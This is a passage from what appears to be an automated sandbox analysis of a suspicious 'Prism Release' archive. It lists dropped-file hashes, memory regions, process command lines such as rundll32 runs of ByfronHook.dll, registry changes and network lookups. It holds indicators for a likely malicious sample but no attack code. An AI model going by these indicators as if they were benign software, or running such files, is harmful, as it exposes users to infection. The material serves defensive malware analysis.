| SHA1 | 4b1d63d59c72c357931a8cbbf071654492a9b371 |
| SHA256 | c7b1f40d77820fbaf2195f2bb3f334b38fec653fe47653f9e30a01ad4ca63ba5 |
| SHA512 | a58c584ada6d271316266d58641be260f98e6fa0ae867ee9e343807a2955ddd3544b864cca80dc7f164ed4be5331575b696650ff0bb469c3647c5cb122f2a64c |
C:\Users\Admin\AppData\Local\Temp\onefile_4004_133628985068537469\tk\ttk\defaults.tcl
| MD5 | 16843ecd9e716a87d865a6539ef44751 |
| SHA1 | 3df76af0d6e4c386d63dd061100702dbb0f72a42 |
| SHA256 | d83248b535a9417ce0ca598bbe245f24252adc90e3611c1191a045d9c0a9c99f |
| SHA512 | 7f5e7a200fd6b012a9336035211d9d89f0504f61156629ebcc1a03bcf8462ba8d219de376b6bb3ebb9e6a9507f0ac6f7d658eed5b953110df553b3c0c44ebc1d |
C:\Users\Admin\AppData\Local\Temp\onefile_4004_133628985068537469\tk\ttk\sizegrip.tcl
| MD5 | 3c8916a58c6ee1d61836e500a54c9321 |
| SHA1 | 54f3f709698fad020a048668749cb5a09ede35ab |
| SHA256 | 717d2edd71076ea059903c7144588f8bbd8b0afe69a55cbf23953149d6694d33 |
| SHA512 | 2b71569a5a96cac1b708e894a2466b1054c3fae5405e10799b182012141634bd2a7e9e9f516658e1a6d6e9e776e397608b581501a6cfe2eb4ec54459e9ecb267 |
C:\Users\Admin\AppData\Local\Temp\onefile_4004_133628985068537469\tk\ttk\treeview.tcl
| MD5 | 5bec78db1a86b4bc17a5108806c5371e |
| SHA1 | 4b2b08240f778864c5045f546a620702ae126ccb |
| SHA256 | 0e05adf29b616989cb4724e57a26f1044598781f0cc10d5eb5ac4af7d705ddca |
| SHA512 | 29dff439bb5caa23f8f38ea136406fa2db68be021068f80bad2e2ec811ae5c5b08f4f287719db946db780122af05654392ea771fb523bdc1569b364689d3ec86 |
C:\Users\Admin\AppData\Local\Temp\onefile_4004_133628985068537469\tk\ttk\spinbox.tcl
| MD5 | ebce661f8125f54c7dff9f076fb2bfe2 |
| SHA1 | 966603a85eadba4e003e8307a7e581cd6839716f |
| SHA256 | 7c2ffd7308bdea852851335d5b5eb5dcca0e4d4a0cea16f786b40009ffd58b71 |
| SHA512 | 35f518e20986ab951ff33091f405ea1647534ccb77c8c36a94b1ab4a973df3ed52355864702b6526888830af8c912105e542027b5d68f81ac2a9f40ad2ba2632 |
C:\Users\Admin\AppData\Local\Temp\onefile_4004_133628985068537469\tk\ttk\combobox.tcl
| MD5 | 06b885722c8555668bcbe8d7d9aa4c75 |
| SHA1 | 8172c8886884de462549aa94fca440b99da90583 |
| SHA256 | 057f8f447de3a753714b8f82b96054e1849a2424749f3482492eae192baacdcf |
| SHA512 | d81ab53d48ed1d79da57fc2d2b599199ee985e237046244a2f820daacd2e8565c65d63e9b6f80175c30fd48290226a547d6d603293a4b7e4a455795f7fce7179 |
C:\Users\Admin\AppData\Local\Temp\onefile_4004_133628985068537469\tk\ttk\entry.tcl
| MD5 | 3dea98c515f6f731e666656da9708f12 |
| SHA1 | 212865fc5c635eeca380efc1b3fbb85554714c47 |
| SHA256 | fe32f8b154893218acaba93ac4b8e1170d9b3e3ab66df63df85c0a31c17592be |
| SHA512 | 2901b5f92df95cbd1ec71acf86646af2f1d6058232eef1b5779192bad6df0bbbbc5902e363f809671f06d13270b1581d55f611556d48b1a843194477a113aeab |
C:\Users\Admin\AppData\Local\Temp\onefile_4004_133628985068537469\tk\ttk\panedwindow.tcl
| MD5 | a12915fa5caf93e23518e9011200f5a4 |
| SHA1 | a61f665a408c10419fb81001578d99b43d048720 |
| SHA256 | ce0053d637b580170938cf552b29ae890559b98eb28038c2f0a23a265ddeb273 |
| SHA512 | 669e1d66f1223cca6ceb120914d5d876bd3cf401ee4a46f35825361076f19c7341695596a7dbb00d6cff4624666fb4e7a2d8e7108c3c56a12bda7b04e99e6f9a |
C:\Users\Admin\AppData\Local\Temp\onefile_4004_133628985068537469\tk\ttk\notebook.tcl
| MD5 | 82c9dfc512e143dda78f91436937d4dd |
| SHA1 | 26abc23c1e0c201a217e3cea7a164171418973b0 |
| SHA256 | d1e5267cde3d7be408b4c94220f7e1833c9d452bb9ba3e194e12a5eb2f9adb80 |
| SHA512 | a9d3c04ad67e0dc3f1c12f9e21ef28a61fa84dbf710313d4ca656bdf35dfbbfba9c268c018004c1f5614db3a1128025d795bc14b4fffaa5603a5313199798d04 |
C:\Users\Admin\AppData\Local\Temp\onefile_4004_133628985068537469\tk\ttk\progress.tcl
| MD5 | b0074341a4bda36bcdff3ebcae39eb73 |
| SHA1 | d070a01cc5a787249bc6dad184b249c4dd37396a |
| SHA256 | a9c34f595e547ce94ee65e27c415195d2b210653a9ffcfb39559c5e0fa9c06f8 |
| SHA512 | af23563602886a648a42b03cc5485d84fcc094ab90b08df5261434631b6c31ce38d83a3a60cc7820890c797f6c778d5b5eff47671ce3ee4710ab14c6110dcc35 |
C:\Users\Admin\AppData\Local\Temp\onefile_4004_133628985068537469\tk\ttk\scale.tcl
| MD5 | b41a9df31924dea36d69cb62891e8472 |
| SHA1 | 4c2877fbb210fdbbde52ea8b5617f68ad2df7b93 |
| SHA256 | 25d0fe2b415292872ef7acdb2dfa12d04c080b7f9b1c61f28c81aa2236180479 |
| SHA512 | a50db6da3d40d07610629de45f06a438c6f2846324c3891c54c99074cfb7beed329f27918c8a85badb22c6b64740a2053b891f8e5d129d9b0a1ff103e7137d83 |
C:\Users\Admin\AppData\Local\Temp\onefile_4004_133628985068537469\tk\ttk\scrollbar.tcl
| MD5 | cf7bc1ffbf3efee2ca7369215a3b1473 |
| SHA1 | e2632241089f9dc47fa76cd0c57615d70753008c |
| SHA256 | b3a0e10c95b28c90cccfc373152bd30ab7da2fb4c0e96409aeeb01d453f36b4a |
| SHA512 | 01841cda93aa0ce1a5b1fc65db153902b872b7e9d1030ef8902e086bbeb35649fd742dd96d1aed9cf620692fde6f4e2ccd865dc7a125452ffd16a65918956dda |
C:\Users\Admin\AppData\Local\Temp\onefile_4004_133628985068537469\tk\ttk\menubutton.tcl
| MD5 | fe89894d8cbf415541a60d77192f0f94 |
| SHA1 | c0716b2d8e24592757b62d24eeed57121b60e00f |
| SHA256 | d9af20135ef1bfeb3e0fd9fdabe821474de3ed43b3745a42fe564d24a8b9fd9c |
| SHA512 | 66488cbcac49cca47c9c560648e891d429f40e46549f58687b98073eba4807a8458a277be093ebfc50709a8a87a529df4e526eccfb60803ce16af17b97accd3d |
C:\Users\Admin\AppData\Local\Temp\onefile_4004_133628985068537469\tk\ttk\button.tcl
| MD5 | ea7cf40852afd55ffda9db29a0e11322 |
| SHA1 | b7b42fac93e250b54eb76d95048ac3132b10e6d8 |
| SHA256 | 391b6e333d16497c4b538a7bdb5b16ef11359b6e3b508d470c6e3703488e3b4d |
| SHA512 | 123d78d6ac34af4833d05814220757dccf2a9af4761fe67a8fe5f67a0d258b3c8d86ed346176ffb936ab3717cfd75b4fab7373f7853d44fa356be6e3a75e51b9 |
C:\Users\Admin\AppData\Local\Temp\onefile_4004_133628985068537469\tk\ttk\utils.tcl
| MD5 | f868a26a299885824b14ca28f68039ce |
| SHA1 | e37a1889e6cc215102ec078d0455622415ed8486 |
| SHA256 | 6c35cd6c7f3ac4be3fe0cc7633dbbde5123155921a441ba702b4347e6f967f34 |
| SHA512 | 14d8fd30fe670ce4630ce5b7b1e4b04a2a3f97d6483d87d0d7a2b675e880ab75e947820a4babd337452d683e0cbb7b92b4c866af19a8dcd5711016e012d597e2 |
C:\Users\Admin\AppData\Local\Temp\onefile_4004_133628985068537469\tk\ttk\cursors.tcl
| MD5 | 74596004dfdbf2ecf6af9c851156415d |
| SHA1 | 933318c992b705bf9f8511621b4458ecb8772788 |
| SHA256 | 7bdffa1c2692c5d1cf67b518f9acb32fa4b4d9936ed076f4db835943bc1a00d6 |
| SHA512 | 0d600b21db67bf9dadbdd49559573078efb41e473e94124ac4d2551bc10ec764846dc1f7674daa79f8d2a8aeb4ca27a5e11c2f30ede47e3ecee77d60d7842262 |
C:\Users\Admin\AppData\Local\Temp\onefile_4004_133628985068537469\tk\ttk\fonts.tcl
| MD5 | 7017b5c1d53f341f703322a40c76c925 |
| SHA1 | 57540c56c92cc86f94b47830a00c29f826def28e |
| SHA256 | 0eb518251fbe9cf0c9451cc1fef6bb6aee16d62da00b0050c83566da053f68d0 |
| SHA512 | fd18976a8fbb7e59b12944c2628dbd66d463b2f7342661c8f67160df37a393fa3c0ce7fdda31073674b7a46e0a0a7d0a7b29ebe0d9488afd9ef8b3a39410b5a8 |
C:\Users\Admin\AppData\Local\Temp\onefile_4004_133628985068537469\tk\ttk\ttk.tcl
| MD5 | e38b399865c45e49419c01ff2addce75 |
| SHA1 | f8a79cbc97a32622922d4a3a5694bccb3f19decb |
| SHA256 | 61baa0268770f127394a006340d99ce831a1c7ad773181c0c13122f7d2c5b7f6 |
| SHA512 | 285f520b648f5ec70dd79190c3b456f4d6da2053210985f9e2c84139d8d51908296e4962b336894ee30536f09fae84b912bc2abf44a7011620f66cc5d9f71a8c |
C:\Users\Admin\AppData\Local\Temp\onefile_4004_133628985068537469\tk\text.tcl
| MD5 | 33230f852aac8a5368aeba1834dcec77 |
| SHA1 | beba97c48a110f4a9fe86f60e5fd4ca6ac55e964 |
| SHA256 | f26ed909a962d02bc03585a6c756f4fe992c311c7f53648137e427747120b441 |
| SHA512 | caac54334c4eb439c18f03eeb5de83aa6bbd6bb07b760a40c60f2d34f5ee1fdd542f83ad427059863f96b0a8f2cb96658171a7cd0c0c2c49e002bd02e6d418f6 |
C:\Users\Admin\AppData\Local\Temp\onefile_4004_133628985068537469\tk\spinbox.tcl
| MD5 | 9971530f110ac2fb7d7ec91789ea2364 |
| SHA1 | ab553213c092ef077524ed56fc37da29404c79a7 |
| SHA256 | 5d6e939b44f630a29c4fcb1e2503690c453118607ff301bef3c07fa980d5075a |
| SHA512 | 81b4cec39b03fbeca59781aa54960f0a10a09733634f401d5553e1aaa3ebf12a110c9d555946fcdd70a9cc897514663840745241ad741dc440bb081a12dcf411 |
C:\Users\Admin\AppData\Local\Temp\onefile_4004_133628985068537469\tk\scrlbar.tcl
| MD5 | b44265f793563ad2ad66865dec63b2c2 |
| SHA1 | 23e6f7095066ed3b65998324021d665d810e6a93 |
| SHA256 | 189e7ee4b67861001c714a55880db34acf7d626a816e18b04b232af9e6e33e81 |
| SHA512 | 3911b13f42091620d8d96ed0cc950792175f88399912092161e1a71f564c7e72b6d448d3b761b6b6b73400ccc8fabd94cb3bfcc8cb3ad8ebdb590c3ffc623dfb |
C:\Users\Admin\AppData\Local\Temp\onefile_4004_133628985068537469\tk\scale.tcl
| MD5 | 1ce32cdaeb04c75bfceea5fb94b8a9f0 |
| SHA1 | cc7614c9eade999963ee78b422157b7b0739894c |
| SHA256 | 58c662dd3d2c653786b05aa2c88831f4e971b9105e4869d866fb6186e83ed365 |
| SHA512 | 1ee5a187615ae32f17936931b30fea9551f9e3022c1f45a2bca81624404f4e68022fcf0b03fbd61820ec6958983a8f2fbfc3ad2ec158433f8e8de9b8fcf48476 |
C:\Users\Admin\AppData\Local\Temp\onefile_4004_133628985068537469\tk\panedwindow.tcl
| MD5 | 2da0a23cc9d6fd970fe00915ea39d8a2 |
| SHA1 | dfe3dc663c19e9a50526a513043d2393869d8f90 |
| SHA256 | 4adf738b17691489c71c4b9d9a64b12961ada8667b81856f7adbc61dffeadf29 |
| SHA512 | b458f3d391df9522d4e7eae8640af308b4209ce0d64fd490bfc0177fde970192295c1ea7229ce36d14fc3e582c7649460b8b7b0214e0ff5629b2b430a99307d4 |
C:\Users\Admin\AppData\Local\Temp\onefile_4004_133628985068537469\tk\menu.tcl
| MD5 | 12ec5260eb7435c7170002e011fe8f17 |
| SHA1 | e88f5423a7133784a1a2d097c4e602e5de564034 |
| SHA256 | 588727079af7ecc44755efe33ebb7414ad2ee68390fc249ce073d38e03c78a4e |
| SHA512 | 5848e5a642f0cfba8b456a6dcef711737229e5f59beb7981a52440a47f5ba9ec85374be8e8b1ccdd952ac71164da04ff88ef07204fd62509952db2cdb6503700 |
C:\Users\Admin\AppData\Local\Temp\onefile_4004_133628985068537469\tk\listbox.tcl
| MD5 | b3b6a3bd19ddde4a97ea7cf95d7a8322 |
| SHA1 | 2f11d97c091de9202f238778c89f13a94a10d3be |
| SHA256 | b92526a55409c67473740551ca128498824d25406e3cc9bb0544e8296d3c5de4 |
| SHA512 | f2bc1fbbd20132725d283b9fab20c3e38ed185a62297e1418572c03fa90b3f813b878be281bb4bdfa1c813b7ee7eff11cbb2f89b5411b1707d90b0e5fd746fb3 |
C:\Users\Admin\AppData\Local\Temp\onefile_4004_133628985068537469\tk\entry.tcl
| MD5 | 1d9ff9bb7fedb472910776361510c610 |
| SHA1 | c190dd07bcc55741b9bdfc210f82df7b7c2fac81 |
| SHA256 | dd351da6288cf7e9f367fd97c97cb476193ff7461b25e31667e85fe720edea04 |
| SHA512 | 85d25622f4e0c9517d8caa454ec4e81c8cbbec25e418f5a2d885d5561999cfb3c3026aac8bf1ca6f9b40993802fda86d60ff8fd2e30a77d56f1c1914af695f03 |
C:\Users\Admin\AppData\Local\Temp\onefile_4004_133628985068537469\tk\button.tcl
| MD5 | cf6e5b2eb7681567c119040939dd6e2c |
| SHA1 | 3e0b905428c293f21074145fe43281f22e699eb4 |
| SHA256 | 2f013b643d62f08ddaaa1dea39ff80d6607569c9e1acc19406377b64d75ccf53 |
| SHA512 | be03edea59be01d2b8de72b6ebe9dceb13d16c522bb5c042cdae83c84eafc6ac7b3650bf924f5f84f4f126634f9d17d74d087316d289f237129921a89aa4e0c8 |
C:\Users\Admin\AppData\Local\Temp\onefile_4004_133628985068537469\tk\icons.tcl
| MD5 | 2652aad862e8fe06a4eedfb521e42b75 |
| SHA1 | ed22459ad3d192ab05a01a25af07247b89dc6440 |
| SHA256 | a78388d68600331d06bb14a4289bc1a46295f48cec31ceff5ae783846ea4d161 |
| SHA512 | 6ecfbb8d136444a5c0dbbce2d8a4206f1558bdd95f111d3587b095904769ac10782a9ea125d85033ad6532edf3190e86e255ac0c0c81dc314e02d95cca86b596 |
C:\Users\Admin\AppData\Local\Temp\onefile_4004_133628985068537469\tcl\opt0.4\pkgIndex.tcl
| MD5 | 92ff1e42cfc5fecce95068fc38d995b3 |
| SHA1 | b2e71842f14d5422a9093115d52f19bcca1bf881 |
| SHA256 | eb9925a8f0fcc7c2a1113968ab0537180e10c9187b139c8371adf821c7b56718 |
| SHA512 | 608d436395d055c5449a53208f3869b8793df267b8476ad31bcdd9659a222797814832720c495d938e34bf7d253ffc3f01a73cc0399c0dfb9c85d2789c7f11c0 |
C:\Users\Admin\AppData\Local\Temp\onefile_4004_133628985068537469\tcl\http1.0\pkgIndex.tcl
| MD5 | 10ec7cd64ca949099c818646b6fae31c |
| SHA1 | 6001a58a0701dff225e2510a4aaee6489a537657 |
| SHA256 | 420c4b3088c9dacd21bc348011cac61d7cb283b9bee78ae72eed764ab094651c |
| SHA512 | 34a0acb689e430ed2903d8a903d531a3d734cb37733ef13c5d243cb9f59c020a3856aad98726e10ad7f4d67619a3af1018f6c3e53a6e073e39bd31d088efd4af |
C:\Users\Admin\AppData\Local\Temp\onefile_4004_133628985068537469\tk\pkgIndex.tcl
| MD5 | d942ff6f65bba8eb6d264db7d876a488 |
| SHA1 | 74d6ca77e6092d79f37e7a1dcd7cced2e89d89cb |
| SHA256 | e0bac49b9a3f0e50be89f692273cea7b7462bfc3e054f323261ef99b708c70a3 |
| SHA512 | 3ac7d992300252109606074aefb693a31cd5cceffb6d7b851a2c8895a0d5e165a139b7038657306128af39c44785b7b4da35b8e1aeb4c30f3f7e7cfcfb789c4c |
C:\Users\Admin\AppData\Local\Temp\onefile_4004_133628985068537469\tcl\package.tcl
| MD5 | 55e2db5dcf8d49f8cd5b7d64fea640c7 |
| SHA1 | 8fdc28822b0cc08fa3569a14a8c96edca03bfbbd |
| SHA256 | 47b6af117199b1511f6103ec966a58e2fd41f0aba775c44692b2069f6ed10bad |
| SHA512 | 824c210106de7eae57a480e3f6e3a5c8fb8ac4bbf0a0a386d576d3eb2a3ac849bdfe638428184056da9e81767e2b63eff8e18068a1cf5149c9f8a018f817d3e5 |
C:\Users\Admin\AppData\Local\Temp\onefile_4004_133628985068537469\tcl8\8.5\msgcat-1.6.1.tm
| MD5 | db52847c625ea3290f81238595a915cd |
| SHA1 | 45a4ed9b74965e399430290bcdcd64aca5d29159 |
| SHA256 | 4fdf70fdcedef97aa8bd82a02669b066b5dfe7630c92494a130fc7c627b52b55 |
| SHA512 | 5a8fb4ada7b2efbf1cadd10dbe4dc7ea7acd101cb8fd0b80dad42be3ed8804fc8695c53e6aeec088c2d4c3ee01af97d148b836289da6e4f9ee14432b923c7e40 |
C:\Users\Admin\AppData\Local\Temp\onefile_4004_133628985068537469\tcl\tm.tcl
| MD5 | 52db1cd97ceab81675e86fa0264ea539 |
| SHA1 | b31693b5408a847f97ee8004fed48e5891df6e65 |
| SHA256 | 6c02298d56e3c4c6b197afc79ec3ce1fc37ae176dc35f5d7ac48246f05f91669 |
| SHA512 | 5032b0a79d0cd5a342af2f9edf8b88b7214e9aa61ba524a42c5be2286741e18fa380ad2d40dda9a0257afceed2ef6e48624013e854f37b5e41cb88a831ad04c9 |
C:\Users\Admin\AppData\Local\Temp\onefile_4004_133628985068537469\tk\tk.tcl
| MD5 | 25094462d2ea6b43133275bf4db31a60 |
| SHA1 | 6bb76294e8fdf4d40027c9d1b994f1ab0014b81b |
| SHA256 | 3e998b41ab23677db31902e1e876e644b279b2e6d8896443f6c434352801cdd1 |
| SHA512 | 8bdae921f367b864ea7f36c9a549ee870d4e4e3c6e942d70722a84ae6b23ff00a33638d8ca8f3b9b8fe084875ba7c8976975849f4dc47cdb5671df47af68cfab |
C:\Users\Admin\AppData\Local\Temp\onefile_4004_133628985068537469\tcl\auto.tcl
| MD5 | 5e9b3e874f8fbeaadef3a004a1b291b5 |
| SHA1 | b356286005efb4a3a46a1fdd53e4fcdc406569d0 |
| SHA256 | f385515658832feb75ee4dce5bd53f7f67f2629077b7d049b86a730a49bd0840 |
| SHA512 | 482c555a0da2e635fa6838a40377eef547746b2907f53d77e9ffce8063c1a24322d8faa3421fc8d12fdcaff831b517a65dafb1cea6f5ea010bdc18a441b38790 |
C:\Users\Admin\AppData\Local\Temp\onefile_4004_133628985068537469\tcl\tclIndex
| MD5 | 996f74f323ea95c03670734814b7887f |
| SHA1 | 49f4b9be5ab77e6ccab8091f315d424d7ac183f3 |
| SHA256 | 962c60eb7e050061462ff72cec9741a7f18307af4aaa68d7665174f904842d13 |
| SHA512 | c4694260c733dc534dc1a70791fa29b725efd078a6846434883362f06f7bf080ca07478208b1909630e1b55fbdccf14484b78b0a5b8c6dad90f190c8c9d88a56 |
C:\Users\Admin\AppData\Local\Temp\onefile_4004_133628985068537469\vcruntime140.dll
| MD5 | 11d9ac94e8cb17bd23dea89f8e757f18 |
| SHA1 | d4fb80a512486821ad320c4fd67abcae63005158 |
| SHA256 | e1d6f78a72836ea120bd27a33ae89cbdc3f3ca7d9d0231aaa3aac91996d2fa4e |
| SHA512 | aa6afd6bea27f554e3646152d8c4f96f7bcaaa4933f8b7c04346e410f93f23cfa6d29362fd5d51ccbb8b6223e094cd89e351f072ad0517553703f5bf9de28778 |
memory/2608-1059-0x00000000072A0000-0x000000000791A000-memory.dmp
memory/2608-1060-0x0000000006170000-0x000000000618A000-memory.dmp
memory/2816-1061-0x00000000065A0000-0x00000000065D2000-memory.dmp
memory/2816-1062-0x00000000749B0000-0x00000000749FC000-memory.dmp
memory/2816-1072-0x0000000007190000-0x00000000071AE000-memory.dmp
memory/2816-1073-0x00000000071C0000-0x0000000007263000-memory.dmp
memory/1676-1074-0x0000000002190000-0x00000000021A0000-memory.dmp
memory/2608-1075-0x0000000007ED0000-0x0000000008474000-memory.dmp
memory/2608-1076-0x0000000007030000-0x00000000070C2000-memory.dmp
memory/2816-1077-0x0000000007380000-0x000000000738A000-memory.dmp
memory/2816-1078-0x0000000007580000-0x0000000007616000-memory.dmp
memory/2816-1079-0x0000000007500000-0x0000000007511000-memory.dmp
memory/2816-1080-0x0000000007540000-0x000000000754E000-memory.dmp
memory/2848-1087-0x0000023E5E500000-0x0000023E5E522000-memory.dmp
memory/2816-1091-0x0000000007550000-0x0000000007564000-memory.dmp
memory/2816-1092-0x0000000007640000-0x000000000765A000-memory.dmp
memory/2816-1093-0x0000000007620000-0x0000000007628000-memory.dmp
memory/2848-1097-0x0000023E76A90000-0x0000023E76CAC000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 6d42b6da621e8df5674e26b799c8e2aa |
| SHA1 | ab3ce1327ea1eeedb987ec823d5e0cb146bafa48 |
| SHA256 | 5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c |
| SHA512 | 53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 1c967279560ca1b998d82b009aef5186 |
| SHA1 | 62c709063e480bf14963e3fd60a0407dc62428ae |
| SHA256 | d22931bb06423504c44c02967f060449b9cd76e2599a3dfa2d5ad7e638b3cba1 |
| SHA512 | 629defeba5f242fd8e8493749a79e3e07e0a98b8be13d0eb29dc5c0fe609b3b76027efa0cbcf702d990014b0844f5f442d2da3e2171fd25f2063a6b6280eb04f |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | ba169f4dcbbf147fe78ef0061a95e83b |
| SHA1 | 92a571a6eef49fff666e0f62a3545bcd1cdcda67 |
| SHA256 | 5ef1421e19fde4bc03cd825dd7d6c0e7863f85fd8f0aa4a4d4f8d555dc7606d1 |
| SHA512 | 8d2e5e552210dcda684682538bc964fdd8a8ff5b24cc2cc8af813729f0202191f98eb42d38d2355df17ae620fe401aad6ceaedaed3b112fdacd32485a3a0c07c |
memory/2608-1134-0x0000000073420000-0x0000000073BD0000-memory.dmp
memory/1676-1138-0x00007FF9AD7F3000-0x00007FF9AD7F5000-memory.dmp
memory/1676-1139-0x0000000002190000-0x00000000021A0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\zdibrj.exe
| MD5 | 32004d8a59efe46298e06798a1a96cb9 |
| SHA1 | da3c34b6d7d4f692e673e45dacc825b3ef17a2ed |
| SHA256 | 03ca5525ec9b76e0d61787679977fff9ed515e7c9d30100ba7d8499a8b62a47f |
| SHA512 | 34c25e4b7ec2f61c6df8da73a720a91ec01762b06be8b12308876711e6a3b44f2633b27a38f2c516ff0925cb5829b70e993167e989ceb9a328d7422f7ab41495 |
memory/556-1264-0x0000015FA7240000-0x0000015FA7259000-memory.dmp
memory/1192-1276-0x000001A5BC600000-0x000001A5BC647000-memory.dmp
memory/116-1277-0x0000023A18900000-0x0000023A18947000-memory.dmp
Analysis: behavioral13
Detonation Overview
Submitted
2024-06-15 04:14
Reported
2024-06-15 04:17
Platform
win7-20240508-en
Max time kernel
121s
Max time network
122s
Command Line
Signatures
Processes
C:\Windows\system32\NOTEPAD.EXE
C:\Windows\system32\NOTEPAD.EXE "C:\Users\Admin\AppData\Local\Temp\Prism Release\license.txt"
Network
Files
Analysis: behavioral15
Detonation Overview
Submitted
2024-06-15 04:14
Reported
2024-06-15 04:17
Platform
win7-20240611-en
Max time kernel
119s
Max time network
120s
Command Line
Signatures
Processes
C:\Windows\system32\NOTEPAD.EXE
C:\Windows\system32\NOTEPAD.EXE "C:\Users\Admin\AppData\Local\Temp\Prism Release\workspace\Saved Scripts.txt"
Network
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-15 04:14
Reported
2024-06-15 04:17
Platform
win10v2004-20240611-en
Max time kernel
149s
Max time network
151s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Prism Release.rar"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Program Files\VideoLAN\VLC\vlc.exe
"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Local\Temp\Prism Release.rar"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 67.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 240.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.16.208.104.in-addr.arpa | udp |
Files
Analysis: behavioral8
Detonation Overview
Submitted
2024-06-15 04:14
Reported
2024-06-15 04:17
Platform
win10v2004-20240611-en
Max time kernel
93s
Max time network
94s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Prism Release\assets.dll",#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral9
Detonation Overview
Submitted
2024-06-15 04:14
Reported
2024-06-15 04:17
Platform
win7-20240508-en
Max time kernel
117s
Max time network
118s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Prism Release\bin\autoattach.dll",#1
Network
Files
Analysis: behavioral12
Detonation Overview
Submitted
2024-06-15 04:14
Reported
2024-06-15 04:17
Platform
win10v2004-20240508-en
Max time kernel
51s
Max time network
54s
Command Line
Signatures
Processes
C:\Windows\system32\NOTEPAD.EXE
C:\Windows\system32\NOTEPAD.EXE "C:\Users\Admin\AppData\Local\Temp\Prism Release\instructions.txt"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-06-15 04:14
Reported
2024-06-15 04:17
Platform
win10v2004-20240508-en
Max time kernel
51s
Max time network
51s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Prism Release\ByfronHook.dll",#1